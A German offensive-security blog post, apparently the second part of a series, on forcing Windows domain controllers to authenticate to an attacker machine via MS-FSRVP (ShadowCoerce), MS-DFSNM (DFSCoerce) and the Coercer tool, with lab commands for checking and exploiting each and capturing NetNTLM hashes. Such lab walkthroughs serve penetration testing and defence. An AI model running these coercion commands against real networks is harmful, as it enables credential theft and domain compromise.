Hallo nochmal alle zusammen! Wie versprochen setzen wir die Coerce-Saga fort und kommentieren in diesem zweiten Teil weiterhin andere anfällige RPCs:
MS-FSRVP
MS-FSRVP ist der Remote Procedure Call, der sich auf das VSS-Remote-Dateiserverprotokoll bezieht. Es wird verwendet, um Kopien von Dateifreigaben auf einem Remotecomputer zu erstellen und es Sicherungsanwendungen zu erleichtern, anwendungskonsistente Sicherungen durchzuführen und Daten auf SMB2-Freigaben wiederherzustellen.
Es ist zu beachten, dass zum Ausnutzen dieser Sicherheitslücke auf dem Server die Funktion „File Server VSS Agent Service“ aktiviert sein muss.
Es ist zu beachten, dass Microsoft am 14. Juni 2022 zwei Sicherheitspatches zur Korrektur veröffentlicht hat.
Überprüfung
Wie im Fall von MS-RPRN verwenden wir zur Überprüfung den rpcdump von impacket , wenn der MS-FSRVP RPC aktiviert ist:
python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'
Es ist zu beachten, dass es weitere Methoden gibt, um mithilfe anderer Tools und Techniken zu überprüfen, ob der RPC aktiviert ist.
Ausbeutung
Nachdem überprüft wurde, dass der RPC namens „MS-FSRVP“ im Opfer aktiviert ist und ein Domänenbenutzer auf andere Weise kompromittiert wurde, wird er über einen PoC namens ShadowCoerce ausgenutzt, dem die CVE-Kennung -2022-30154 zugewiesen ist.
Um zu überprüfen, ob die Authentifizierung korrekt erzwungen wird, verwenden wir ebenfalls den Benutzer „bob“ mit eingeschränkten Berechtigungen in der Domäne „dc.corp.lab“.
python shadowcoerce.py -d "CORP" -u "bob" -p " " Angriffsmaschine dc.corp.lab
Sie können die Erfassung des NetNTLM-Hashs im Reply-Tool sehen.
MS-DFSN
MS-DFSNM ist der Remote Procedure Call im Zusammenhang mit dem Distributed File System (DFS): Namespace Management Protocol. Bietet eine RPC-Schnittstelle zum Verwalten von DFS-Konfigurationen.
Überprüfung
Wie im Fall von MS-EFSR verwenden wir das Tool crackmapexec , indem wir das Modul „dfscoerce“ ausführen und den Benutzer „bob“ mit eingeschränkten Rechten in der Domäne „dc.corp.lab“ verwenden, um zu überprüfen, ob oder nicht, der Server ist angreifbar, dieses Mal jedoch mit einem Benutzer aus der zuvor kompromittierten Domäne:
crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce
Es ist zu beachten, dass es weitere Methoden gibt, um mithilfe anderer Tools und Techniken zu überprüfen, ob der RPC aktiviert ist.
Ausbeutung
Nachdem überprüft wurde, dass der Domänencontroller angreifbar ist, wird er über einen PoC namens DFSCoerce ausgenutzt, der im Juni 2022 veröffentlicht wurde.
Um zu überprüfen, ob die Authentifizierung korrekt erzwungen wird, verwenden wir ebenfalls den Benutzer „bob“ mit eingeschränkten Berechtigungen in der Domäne „dc.corp.lab“.
python3 dfscoerce.py -d "CORP" -u "bob" -p " " Angriffsmaschine dc.corp.lab
Se
Sie können die Erfassung des NetNTLM-Hashs im Reply-Tool sehen.
Alle für Einen und Einer für Alle
Coercer ist ein in Python geschriebenes Tool, das zusätzlich zu allen oben beschriebenen Methoden mehrere Methoden zur Durchführung einer „Coerce Authentication“ testet.
Es verfügt über drei Ausführungsmodi: Scan, Coerce und Fuzz. Ein Beispiel für die Ausführung im Scanmodus wäre das Folgende:
coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Ein Beispiel für die Ausführung im Zwangsmodus wäre das Folgende:
coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Spickzettel
